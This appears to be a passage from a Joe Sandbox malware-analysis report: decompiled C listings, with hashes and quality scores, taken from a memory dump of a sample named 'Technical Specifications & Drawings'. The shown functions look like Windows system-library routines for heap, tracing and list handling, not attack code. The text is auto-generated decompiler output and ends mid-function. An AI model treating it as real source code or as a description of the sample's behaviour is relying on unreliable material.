                                                  • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction ID: 250ea9432e4c38f85d0bb2de27003d6223ca9ee5dd11f9b4c3caf65afc8abe66
                                                  • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                  • Instruction Fuzzy Hash: B22146362082049FD705DF1CC884B6ABBA5EFD1350F04852DF995DB385CB30DA09CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E01827794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _t21;
                                                  				void* _t24;
                                                  				intOrPtr _t25;
                                                  				void* _t36;
                                                  				short _t39;
                                                  				signed char* _t42;
                                                  				unsigned int _t46;
                                                  				void* _t50;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t21 =  *0x1897b9c; // 0x0
                                                  				_t46 = _a8;
                                                  				_v12 = __edx;
                                                  				_v8 = __ecx;
                                                  				_t4 = _t46 + 0x2e; // 0x2e
                                                  				_t36 = _t4;
                                                  				_t24 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                  				_t50 = _t24;
                                                  				if(_t50 != 0) {
                                                  					_t25 = _a4;
                                                  					if(_t25 == 5) {
                                                  						L3:
                                                  						_t39 = 0x14b1;
                                                  					} else {
                                                  						_t39 = 0x14b0;
                                                  						if(_t25 == 6) {
                                                  							goto L3;
                                                  						}
                                                  					}
                                                  					 *((short*)(_t50 + 6)) = _t39;
                                                  					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                  					_t11 = _t50 + 0x2c; // 0x2c
                                                  					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                  					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                  					E017EF3E0(_t11, _a12, _t46);
                                                  					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                  					if(E017C7D50() == 0) {
                                                  						_t42 = 0x7ffe0384;
                                                  					} else {
                                                  						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  					}
                                                  					_push(_t50);
                                                  					_t19 = _t36 - 0x20; // 0xe
                                                  					_push(0x403);
                                                  					_push( *_t42 & 0x000000ff);
                                                  					E017E9AE0();
                                                  					_t24 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                  				}
                                                  				return _t24;
                                                  			}














                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                  • Instruction ID: 71fdfcbd3a86502edf7a19bf8dbf8271fd56f62bdf3981a521d327bbe82a2b48
                                                  • Opcode Fuzzy Hash: 1dcc3be420c957d6955c46a250a74d8d827201e14334d58b9f7c3df8ca90d5cf
                                                  • Instruction Fuzzy Hash: D821DE72900614AFC726DF69D884E6BBBF8EF58740F10016DFA0AD7750D634EA40CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E017CAE73(intOrPtr __ecx, void* __edx) {
                                                  				intOrPtr _v8;
                                                  				void* _t19;
                                                  				char* _t22;
                                                  				signed char* _t24;
                                                  				intOrPtr _t25;
                                                  				intOrPtr _t27;
                                                  				void* _t31;
                                                  				intOrPtr _t36;
                                                  				char* _t38;
                                                  				signed char* _t42;
                                                  
                                                  				_push(__ecx);
                                                  				_t31 = __edx;
                                                  				_v8 = __ecx;
                                                  				_t19 = E017C7D50();
                                                  				_t38 = 0x7ffe0384;
                                                  				if(_t19 != 0) {
                                                  					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  				} else {
                                                  					_t22 = 0x7ffe0384;
                                                  				}
                                                  				_t42 = 0x7ffe0385;
                                                  				if( *_t22 != 0) {
                                                  					if(E017C7D50() == 0) {
                                                  						_t24 = 0x7ffe0385;
                                                  					} else {
                                                  						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  					}
                                                  					if(( *_t24 & 0x00000010) != 0) {
                                                  						goto L17;
                                                  					} else {
                                                  						goto L3;
                                                  					}
                                                  				} else {
                                                  					L3:
                                                  					_t27 = E017C7D50();
                                                  					if(_t27 != 0) {
                                                  						_t27 =  *[fs:0x30];
                                                  						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                  					}
                                                  					if( *_t38 != 0) {
                                                  						_t27 =  *[fs:0x30];
                                                  						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                  							goto L5;
                                                  						}
                                                  						_t27 = E017C7D50();
                                                  						if(_t27 != 0) {
                                                  							_t27 =  *[fs:0x30];
                                                  							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                  						}
                                                  						if(( *_t42 & 0x00000020) != 0) {
                                                  							L17:
                                                  							_t25 = _v8;
                                                  							_t36 = 0;
                                                  							if(_t25 != 0) {
                                                  								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                  							}
                                                  							_t27 = E01827794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                  						}
                                                  						goto L5;
                                                  					} else {
                                                  						L5:
                                                  						return _t27;
                                                  					}
                                                  				}
                                                  			}














                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction ID: 34c5e06aa9359a9f868d5963b5b18eef5b5667b2efe8394fe197852a7e5e395d
                                                  • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                  • Instruction Fuzzy Hash: A72104726016858FE7169B6CC948B25BBE9EF04B40F2904E8DD04CB296E734DD40CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E017DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				void* _t19;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t37;
                                                  				intOrPtr* _t40;
                                                  
                                                  				_t35 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t37 = 0;
                                                  				_v8 = __edx;
                                                  				_t29 = __ecx;
                                                  				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                  					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                  					L3:
                                                  					_t19 = _a4 - 4;
                                                  					if(_t19 != 0) {
                                                  						if(_t19 != 1) {
                                                  							L7:
                                                  							return _t37;
                                                  						}
                                                  						if(_t35 == 0) {
                                                  							L11:
                                                  							_t37 = 0xc000000d;
                                                  							goto L7;
                                                  						}
                                                  						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                  							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                  							_t35 = _v8;
                                                  						}
                                                  						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                  						goto L7;
                                                  					}
                                                  					if(_t29 == 0) {
                                                  						goto L11;
                                                  					}
                                                  					_t32 =  *_t40;
                                                  					if(_t32 != 0) {
                                                  						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                  						E017B76E2( *_t40);
                                                  					}
                                                  					 *_t40 = _t29;
                                                  					goto L7;
                                                  				}
                                                  				_t40 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                  				if(_t40 == 0) {
                                                  					_t37 = 0xc0000017;
                                                  					goto L7;
                                                  				}
                                                  				_t35 = _v8;
                                                  				 *_t40 = 0;
                                                  				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                  				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                  				goto L3;
                                                  			}











                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction ID: 9affe2f3c88bbd89d7f7896ed08eb9fe7ffbe0eb7aca65d8b29041588e4f9552
                                                  • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                  • Instruction Fuzzy Hash: 3F217972640A89DFD735CF0DC540E66FBF5EB98B10F2481AEE94A87619D730AD42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 54%
                                                  			E017DB390(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				signed char _t12;
                                                  				signed int _t16;
                                                  				signed int _t21;
                                                  				void* _t28;
                                                  				signed int _t30;
                                                  				signed int _t36;
                                                  				signed int _t41;
                                                  
                                                  				_push(__ecx);
                                                  				_t41 = _a4 + 0xffffffb8;
                                                  				E017C2280(_t12, 0x1898608);
                                                  				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                  				asm("sbb edi, edi");
                                                  				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                  				_v8 = _t36;
                                                  				asm("lock cmpxchg [ebx], ecx");
                                                  				_t30 = 1;
                                                  				if(1 != 1) {
                                                  					while(1) {
                                                  						_t21 = _t30 & 0x00000006;
                                                  						_t16 = _t30;
                                                  						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                  						asm("lock cmpxchg [edi], esi");
                                                  						if(_t16 == _t30) {
                                                  							break;
                                                  						}
                                                  						_t30 = _t16;
                                                  					}
                                                  					_t36 = _v8;
                                                  					if(_t21 == 2) {
                                                  						_t16 = E017E00C2(0x1898608, 0, _t28);
                                                  					}
                                                  				}
                                                  				if(_t36 != 0) {
                                                  					_t16 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                  				}
                                                  				return _t16;
                                                  			}












                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                  • Instruction ID: 7cac9358d5b767e33a255a5ea1fe4be479a4257301aef5785ecb2a4a24482433
                                                  • Opcode Fuzzy Hash: a781b35d91a89bd54189aabe8a249bcd2837f86004eb43709ae30366ed0fceed
                                                  • Instruction Fuzzy Hash: EA116B337061199BCB1E8E19CD85A6BB2ABEBC7730B29012DDE16CB380CD319D02C6D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E017A9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t37;
                                                  				intOrPtr _t41;
                                                  				intOrPtr* _t46;
                                                  				void* _t48;
                                                  				intOrPtr _t50;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t65;
                                                  				void* _t66;
                                                  				void* _t68;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x187f708);
                                                  				E017FD08C(__ebx, __edi, __esi);
                                                  				_t65 = __ecx;
                                                  				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                  				if( *(__ecx + 0x24) != 0) {
                                                  					_push( *(__ecx + 0x24));
                                                  					E017E95D0();
                                                  					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                  				}
                                                  				L6();
                                                  				L6();
                                                  				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                  				E017E95D0();
                                                  				_t33 =  *0x18984c4; // 0x0
                                                  				L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                  				_t37 =  *0x18984c4; // 0x0
                                                  				L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                  				_t41 =  *0x18984c4; // 0x0
                                                  				E017C2280(L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18986b4);
                                                  				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                  				_t46 = _t65 + 0xe8;
                                                  				_t62 =  *_t46;
                                                  				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                  				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                  					_t61 = 3;
                                                  					asm("int 0x29");
                                                  					_push(_t65);
                                                  					_t66 = _t61;
                                                  					_t23 = _t66 + 0x14; // 0x8df8084c
                                                  					_push( *_t23);
                                                  					E017E95D0();
                                                  					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                  					_push( *_t24);
                                                  					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                  					_t48 = E017E95D0();
                                                  					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                  					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                  					return _t48;
                                                  				} else {
                                                  					 *_t60 = _t62;
                                                  					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                  					 *(_t68 - 4) = 0xfffffffe;
                                                  					E017A9325();
                                                  					_t50 =  *0x18984c4; // 0x0
                                                  					return E017FD0D1(L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                  				}
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fa31f9dff591a8cb699f8b1632c8c159166def6e05f074cae529c957d02f1c6e
                                                  • Instruction ID: e5eee9049c00a14a84eb8e0441f688293e474d95fbf3f273df58cf33b047c2da
                                                  • Opcode Fuzzy Hash: fa31f9dff591a8cb699f8b1632c8c159166def6e05f074cae529c957d02f1c6e
                                                  • Instruction Fuzzy Hash: 71214A72041602DFC726EF68CA48F5AF7F9FF19708F14456CA209866A6CB34E951CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E01834257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr* _t18;
                                                  				intOrPtr _t24;
                                                  				intOrPtr* _t27;
                                                  				intOrPtr* _t30;
                                                  				intOrPtr* _t31;
                                                  				intOrPtr _t33;
                                                  				intOrPtr* _t34;
                                                  				intOrPtr* _t35;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				void* _t39;
                                                  				void* _t43;
                                                  
                                                  				_t39 = __eflags;
                                                  				_t35 = __edi;
                                                  				_push(8);
                                                  				_push(0x18808d0);
                                                  				E017FD08C(__ebx, __edi, __esi);
                                                  				_t37 = __ecx;
                                                  				E018341E8(__ebx, __edi, __ecx, _t39);
                                                  				E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                  				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                  				_t18 = _t37 + 8;
                                                  				_t33 =  *_t18;
                                                  				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                  				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                  					L8:
                                                  					_push(3);
                                                  					asm("int 0x29");
                                                  				} else {
                                                  					 *_t27 = _t33;
                                                  					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                  					_t35 = 0x18987e4;
                                                  					_t18 =  *0x18987e0; // 0x0
                                                  					while(_t18 != 0) {
                                                  						_t43 = _t18 -  *0x1895cd0; // 0xffffffff
                                                  						if(_t43 >= 0) {
                                                  							_t31 =  *0x18987e4; // 0x0
                                                  							_t18 =  *_t31;
                                                  							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                  								goto L8;
                                                  							} else {
                                                  								 *0x18987e4 = _t18;
                                                  								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                  								L017A7055(_t31 + 0xfffffff8);
                                                  								_t24 =  *0x18987e0; // 0x0
                                                  								_t18 = _t24 - 1;
                                                  								 *0x18987e0 = _t18;
                                                  								continue;
                                                  							}
                                                  						}
                                                  						goto L9;
                                                  					}
                                                  				}
                                                  				L9:
                                                  				__eflags =  *0x1895cd0;
                                                  				if( *0x1895cd0 <= 0) {
                                                  					L017A7055(_t37);
                                                  				} else {
                                                  					_t30 = _t37 + 8;
                                                  					_t34 =  *0x18987e8; // 0x0
                                                  					__eflags =  *_t34 - _t35;
                                                  					if( *_t34 != _t35) {
                                                  						goto L8;
                                                  					} else {
                                                  						 *_t30 = _t35;
                                                  						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                  						 *_t34 = _t30;
                                                  						 *0x18987e8 = _t30;
                                                  						 *0x18987e0 = _t18 + 1;
                                                  					}
                                                  				}
                                                  				 *(_t38 - 4) = 0xfffffffe;
                                                  				return E017FD0D1(L01834320());
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41e83893bbe3fbb9baf89a7e4059ddd178ad02ec10e45b6afd7a83b81786aa40
                                                  • Instruction ID: b6fbbc933ba44b42dd203fab3a509ff5c20ed84e2ab3cc33386aea24c3aa2702
                                                  • Opcode Fuzzy Hash: 41e83893bbe3fbb9baf89a7e4059ddd178ad02ec10e45b6afd7a83b81786aa40
                                                  • Instruction Fuzzy Hash: DC216D70501A06DFC725DF68D040A58BBF1FB87314B5C826EC119DB26ADB72D691CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 34%
                                                  			E017D2397(intOrPtr _a4) {
                                                  				void* __ebx;
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed int _t11;
                                                  				void* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				intOrPtr _t27;
                                                  				void* _t28;
                                                  				void* _t29;
                                                  
                                                  				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                  				if( *0x189848c != 0) {
                                                  					L017CFAD0(0x1898610);
                                                  					if( *0x189848c == 0) {
                                                  						E017CFA00(0x1898610, _t19, _t27, 0x1898610);
                                                  						goto L1;
                                                  					} else {
                                                  						_push(0);
                                                  						_push(_a4);
                                                  						_t26 = 4;
                                                  						_t29 = E017D2581(0x1898610, 0x17850a0, _t26, _t27, _t28);
                                                  						E017CFA00(0x1898610, 0x17850a0, _t27, 0x1898610);
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					_t11 =  *0x1898614; // 0x0
                                                  					if(_t11 == 0) {
                                                  						_t11 = E017E4886(0x1781088, 1, 0x1898614);
                                                  					}
                                                  					_push(0);
                                                  					_push(_a4);
                                                  					_t25 = 4;
                                                  					_t29 = E017D2581(0x1898610, (_t11 << 4) + 0x1785070, _t25, _t27, _t28);
                                                  				}
                                                  				if(_t29 != 0) {
                                                  					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                  					 *((char*)(_t29 + 0x40)) = 0;
                                                  				}
                                                  				return _t29;
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b119ae6921a68fbd6e41defdd9b448e4e57d58f125435561346c2b36d589d60
                                                  • Instruction ID: 79c51caec5c185fbc035f8acb14ece46ca7ce071de6b2e9df9acc535d206175a
                                                  • Opcode Fuzzy Hash: 5b119ae6921a68fbd6e41defdd9b448e4e57d58f125435561346c2b36d589d60
                                                  • Instruction Fuzzy Hash: 48112B3274430A67E731A63EDC88F19F6E9FBA2710F18406EF603DB256C970D9028794
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E018246A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                  				signed short* _v8;
                                                  				unsigned int _v12;
                                                  				intOrPtr _v16;
                                                  				signed int _t22;
                                                  				signed char _t23;
                                                  				short _t32;
                                                  				void* _t38;
                                                  				char* _t40;
                                                  
                                                  				_v12 = __edx;
                                                  				_t29 = 0;
                                                  				_v8 = __ecx;
                                                  				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                  				_t38 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                  				if(_t38 != 0) {
                                                  					_t40 = _a4;
                                                  					 *_t40 = 1;
                                                  					E017EF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                  					_t22 = _v12 >> 1;
                                                  					_t32 = 0x2e;
                                                  					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                  					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                  					_t23 = E017DD268(_t38, 1);
                                                  					asm("sbb al, al");
                                                  					 *_t40 =  ~_t23 + 1;
                                                  					L017C77F0(_v16, 0, _t38);
                                                  				} else {
                                                  					 *_a4 = 0;
                                                  					_t29 = 0xc0000017;
                                                  				}
                                                  				return _t29;
                                                  			}












                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction ID: ebda0e3853947a1fcb80953962f484d9f6d738f95065ef0dd476ecdea8b52058
                                                  • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                  • Instruction Fuzzy Hash: 46110272504208BBCB169F6CD8808BEF7B9EF95300F10806EF984CB350DA318E51C7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E017E37F5(void* __ecx, intOrPtr* __edx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed char _t6;
                                                  				intOrPtr _t13;
                                                  				intOrPtr* _t20;
                                                  				intOrPtr* _t27;
                                                  				void* _t28;
                                                  				intOrPtr* _t29;
                                                  
                                                  				_t27 = __edx;
                                                  				_t28 = __ecx;
                                                  				if(__edx == 0) {
                                                  					E017C2280(_t6, 0x1898550);
                                                  				}
                                                  				_t29 = E017E387E(_t28);
                                                  				if(_t29 == 0) {
                                                  					L6:
                                                  					if(_t27 == 0) {
                                                  						E017BFFB0(0x1898550, _t27, 0x1898550);
                                                  					}
                                                  					if(_t29 == 0) {
                                                  						return 0xc0000225;
                                                  					} else {
                                                  						if(_t27 != 0) {
                                                  							goto L14;
                                                  						}
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                  						goto L11;
                                                  					}
                                                  				} else {
                                                  					_t13 =  *_t29;
                                                  					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                  						L13:
                                                  						_push(3);
                                                  						asm("int 0x29");
                                                  						L14:
                                                  						 *_t27 = _t29;
                                                  						L11:
                                                  						return 0;
                                                  					}
                                                  					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                  					if( *_t20 != _t29) {
                                                  						goto L13;
                                                  					}
                                                  					 *_t20 = _t13;
                                                  					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                  					asm("btr eax, ecx");
                                                  					goto L6;
                                                  				}
                                                  			}












                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9545daa5ca110e88a9190e3f4bda31d9c33ec089c02d4f84537593940b97f913
                                                  • Instruction ID: 722a2edd11c9a36539f7d2781f4ad5fc99c239181b9eabca8a0c41cdd1161101
                                                  • Opcode Fuzzy Hash: 9545daa5ca110e88a9190e3f4bda31d9c33ec089c02d4f84537593940b97f913
                                                  • Instruction Fuzzy Hash: 7E01D672A816119BC3378B1D9948E26FBE6FFCAB51716406DE945CB216DB30C801CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017D002D() {
                                                  				void* _t11;
                                                  				char* _t14;
                                                  				signed char* _t16;
                                                  				char* _t27;
                                                  				signed char* _t29;
                                                  
                                                  				_t11 = E017C7D50();
                                                  				_t27 = 0x7ffe0384;
                                                  				if(_t11 != 0) {
                                                  					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  				} else {
                                                  					_t14 = 0x7ffe0384;
                                                  				}
                                                  				_t29 = 0x7ffe0385;
                                                  				if( *_t14 != 0) {
                                                  					if(E017C7D50() == 0) {
                                                  						_t16 = 0x7ffe0385;
                                                  					} else {
                                                  						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  					}
                                                  					if(( *_t16 & 0x00000040) != 0) {
